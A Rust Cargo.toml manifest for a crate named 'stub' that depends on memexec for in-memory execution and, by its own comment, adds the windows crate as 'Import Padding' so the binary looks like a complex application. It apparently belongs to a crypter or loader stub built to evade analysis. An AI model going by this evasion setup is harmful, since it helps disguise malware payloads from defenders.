[package]
name = "stub"
version = "1.0.0"
edition = "2021"

[dependencies]
common = { path = "../common" }
memexec = "0.2.0"
# Adding windows crate for "Import Padding" to make the binary look like a complex application
windows = { version = "0.52.0", features = [
    "Win32_System_SystemInformation",
    "Win32_UI_WindowsAndMessaging",
    "Win32_System_Diagnostics_Debug",
    "Win32_System_Console",
    "Win32_Foundation",
    "Win32_System_Threading",
    "Win32_System_LibraryLoader"
] }

[build-dependencies]
winres = "0.1"
rand = "0.8"
